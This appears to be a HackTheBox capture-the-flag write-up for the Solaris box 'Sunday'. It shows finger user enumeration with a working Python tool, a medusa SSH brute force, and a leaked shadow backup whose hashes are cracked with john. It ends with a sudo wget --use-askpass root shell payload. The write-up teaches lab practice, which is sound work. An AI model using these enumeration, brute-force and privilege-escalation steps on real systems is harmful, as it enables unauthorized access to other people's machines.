Target // Sunday
Platform: HTB
OS: Solaris
Difficulty: Easy
IP: 10.129.8.23

Enumeration#

Nmap#

PORT      STATE SERVICE VERSION
79/tcp    open  finger?
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)

Solaris box with an unusual port layout: SSH on 22022 instead of 22, the finger service on 79, and an Apache instance on 6787.

Finger Enumeration#

The finger service leaks valid usernames. Using Metasploit’s scanner/finger/finger_users:

# Wordlist: /usr/share/seclists/Usernames/Names/names.txt
# Notable users found:
sammy, sunny, root

Confirming with manual finger queries:

finger sunny@10.129.8.23
# Login: sunny  TTY: ssh  Idle: <Apr 13, 2022> 10.10.14.13

finger sammy@10.129.8.23
# Login: sammy  TTY: ssh  Idle: <Apr 13, 2022> 10.10.14.13

Both sammy and sunny exist and have logged in over SSH; the Where column even gives the source address of their last login.
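The same enumeration the Metasploit module performs can be done with a few lines of Python, which makes the protocol easier to see: one TCP connection to port 79 per candidate, the name followed by CRLF, and a reply whose rows either carry the login or mark it with `???`. This is an added example, not code from the writeup or from Metasploit. `finger_query()` speaks to a live fingerd; `parse_finger_response()` is exercised offline on constructed Solaris-style replies (the sample text is constructed, not captured from the box).

```python
"""Finger (RFC 1288) user enumeration helper.

Added example; not code from the original writeup or from Metasploit.
finger_query() talks to a live fingerd; parse_finger_response() is exercised
offline below on constructed Solaris-style replies.
"""
import socket
import sys
from typing import Callable, Dict, Iterable, List, Optional

FINGER_PORT = 79


def finger_query(host: str, user: str, port: int = FINGER_PORT,
                 timeout: float = 5.0) -> str:
    """Send one RFC 1288 query ('<user>\\r\\n') and return the daemon's raw reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(f"{user}\r\n".encode())
        chunks: List[bytes] = []
        while True:
            data = sock.recv(4096)
            if not data:            # fingerd closes the connection after one answer
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def parse_finger_response(user: str, reply: str) -> Optional[Dict[str, str]]:
    """Return a record if fingerd knows `user`, None if it reported the login as unknown.

    Solaris fingerd prints a 'Login Name TTY Idle When Where' header and then
    one row per match; an unknown login shows up as '<name> ???'.
    """
    for line in reply.splitlines():
        fields = line.split()
        if not fields or fields[0] != user:
            continue
        if "???" in fields:
            return None
        record = {"login": user, "raw": line.strip()}
        # When a login source is recorded it is the last token (the Where column).
        if len(fields) > 1 and "." in fields[-1]:
            record["where"] = fields[-1]
        return record
    return None


def enumerate_users(candidates: Iterable[str],
                    query: Callable[[str], str]) -> Dict[str, Dict[str, str]]:
    """Query every candidate name and keep the ones the daemon confirms."""
    found: Dict[str, Dict[str, str]] = {}
    for user in candidates:
        record = parse_finger_response(user, query(user))
        if record is not None:
            found[user] = record
    return found


# Constructed replies in the Solaris fingerd layout (not captures from the box).
SAMPLE_REPLIES = {
    "sunny": ("Login       Name               TTY         Idle    When    Where\n"
              "sunny    sunny                 ssh          <Apr 13, 2022> 10.10.14.13\n"),
    "sammy": ("Login       Name               TTY         Idle    When    Where\n"
              "sammy    sammy                 ssh          <Apr 13, 2022> 10.10.14.13\n"),
    "nobody9": ("Login       Name               TTY         Idle    When    Where\n"
                "nobody9      ???\n"),
}


def offline_demo() -> Dict[str, Dict[str, str]]:
    """Run the enumeration logic against the constructed replies only."""
    return enumerate_users(SAMPLE_REPLIES, lambda u: SAMPLE_REPLIES[u])


if __name__ == "__main__":
    if len(sys.argv) == 3:      # usage: finger_enum.py <host> <wordlist>
        host, wordlist = sys.argv[1], sys.argv[2]
        with open(wordlist) as fh:
            names = [n.strip() for n in fh if n.strip()]
        hits = enumerate_users(names, lambda u: finger_query(host, u))
    else:
        hits = offline_demo()
    for login, rec in hits.items():
        print(f"{login}: {rec.get('where', 'no login source recorded')}")
```

Run it with no arguments to see the parser's verdict on the constructed replies, or with a host and a names wordlist to do what the Metasploit module does. The `???` check is what separates a valid login from a miss on Solaris; other fingerd implementations word their "no such user" line differently, so check one known-bad name by hand before trusting a bulk run.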


Foothold#

SSH Brute Force#

With two valid usernames and SSH on a non-standard port, brute force is worth a shot:

medusa -h 10.129.8.23 -u sunny -P /usr/share/wordlists/john.lst -M ssh -n 22022 -t 10 -f

ACCOUNT FOUND: [ssh] Host: 10.129.8.23 User: sunny Password: sunday [SUCCESS]

Credentials: sunny:sunday. Honestly, trying the box name (sunday) as a password first would have saved the brute force.


Lateral Movement#

Shadow Backup → sammy#

Checking sunny’s bash history reveals breadcrumbs:

cat .bash_history
# ...
cat /backup/shadow.backup
sudo /root/troll

Following the trail:

cat /backup/shadow.backup

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

The $5$ prefix marks sha256crypt. Save sammy's line to a file called hash and crack it:

john hash --wordlist=/usr/share/wordlists/rockyou.txt

cooldude!        (sammy)

su sammy with cooldude! and we're in.
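Before feeding a shadow backup to john it is worth triaging it: which entries actually carry a hash, which algorithm the `$id$` prefix announces, how old the password is (the third field is days since the epoch), and whether the file mode is the real finding. The following is an added example, not code from the writeup; it classifies and prepares john input only and leaves the cracking to john. The sammy and sunny lines are the two shown above; the root and svc lines are constructed to show a Solaris no-password (NP) and locked (*LK*) entry.

```python
"""Triage a shadow(4)-style backup: crackable entries, algorithm, password age,
and whether the file mode leaks it to everyone.

Added example; not code from the original writeup. The sammy and sunny lines
are from the page; root and svc are constructed placeholders.
"""
import datetime
import os
import stat
from dataclasses import dataclass
from typing import Dict, List, Optional

# Modular-crypt identifier -> algorithm (also usable as the john --format= name).
CRYPT_IDS = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "y": "yescrypt",
}
# Markers meaning "no usable hash": Solaris NP / *LK*, Linux * / ! / !!.
NO_HASH = {"*", "!", "!!", "NP", "*NP*", "*LK*"}
EPOCH = datetime.date(1970, 1, 1)


@dataclass
class ShadowEntry:
    login: str
    hash: str
    lastchg: Optional[int]      # third shadow field: days since the epoch

    @property
    def algorithm(self) -> Optional[str]:
        """Algorithm name, or None when the field is a lock/no-password marker."""
        if self.hash in NO_HASH or self.hash.startswith("!"):
            return None
        if not self.hash.startswith("$"):
            return "descrypt"   # legacy 13-character DES crypt
        ident = self.hash.split("$")[1]
        return CRYPT_IDS.get(ident, f"unknown(${ident}$)")

    @property
    def crackable(self) -> bool:
        return self.algorithm is not None

    @property
    def last_changed(self) -> Optional[datetime.date]:
        if self.lastchg is None:
            return None
        return EPOCH + datetime.timedelta(days=self.lastchg)


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse 'login:hash:lastchg:min:max:warn:inactive:expire:flag' lines."""
    entries: List[ShadowEntry] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        lastchg = int(fields[2]) if len(fields) > 2 and fields[2].isdigit() else None
        entries.append(ShadowEntry(fields[0], fields[1], lastchg))
    return entries


def john_input(entries: List[ShadowEntry]) -> str:
    """'login:hash' lines for the crackable entries, ready for john --wordlist=."""
    return "\n".join(f"{e.login}:{e.hash}" for e in entries if e.crackable)


def is_world_readable(mode: int) -> bool:
    """True if the 'other' read bit is set, which is the finding on this box."""
    return bool(mode & stat.S_IROTH)


def audit_backup(path: str) -> Dict[str, object]:
    """Stat and parse a backup on disk (live check; not used by the offline demo)."""
    st = os.stat(path)
    with open(path) as fh:
        entries = parse_shadow(fh.read())
    return {"world_readable": is_world_readable(st.st_mode), "owner_uid": st.st_uid,
            "crackable": [e.login for e in entries if e.crackable]}


SAMPLE_BACKUP = """\
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
root:NP:6445::::::
svc:*LK*:17636::::::
"""


def triage(text: str = SAMPLE_BACKUP) -> List[Dict[str, object]]:
    """One summary row per entry: who is worth cracking, with what, and since when."""
    return [{"login": e.login, "algorithm": e.algorithm, "crackable": e.crackable,
             "last_changed": e.last_changed.isoformat() if e.last_changed else None}
            for e in parse_shadow(text)]


if __name__ == "__main__":
    for row in triage():
        print(row)
    print(john_input(parse_shadow(SAMPLE_BACKUP)))
```

On the two page entries this reports sha256crypt for both, a last change of 2018-04-15 for sunny, and emits exactly the two `login:hash` lines john needs; the constructed NP and *LK* rows are skipped, which is the usual Solaris noise in a backup like this. `audit_backup()` is the check to run on a live host: a shadow backup readable by others is the bug here, independent of how strong the hashes inside it are.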


Privilege Escalation#

sudo wget --use-askpass#

sudo -l
# User sammy may run the following commands on sunday:
#     (ALL) ALL
#     (root) NOPASSWD: /usr/bin/wget

wget runnable as root without a password is a clean GTFOBins escalation via --use-askpass: wget executes the named helper (as root) to obtain credentials for the URL, so a helper that is really a shell script gives us a root shell.

TF=$(mktemp)
chmod +x $TF
# The "askpass" helper execs a shell; 1>&0 points its stdout back at the terminal
# instead of the pipe wget reads the password from
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
# Any URL argument will do; "0" just satisfies wget's argument check
sudo /usr/bin/wget --use-askpass=$TF 0
# whoami
root

Proof#

root@sunday

# whoami
root

Key Takeaways#

[ Note ]
  • The finger service is a goldmine for user enumeration on older systems – always check it
  • Backup shadow files with world-readable permissions are a common CTF (and real-world) finding
  • Bash history often contains hints about where to look next – check it early
  • sudo wget with --use-askpass is an underrated GTFOBins technique for privilege escalation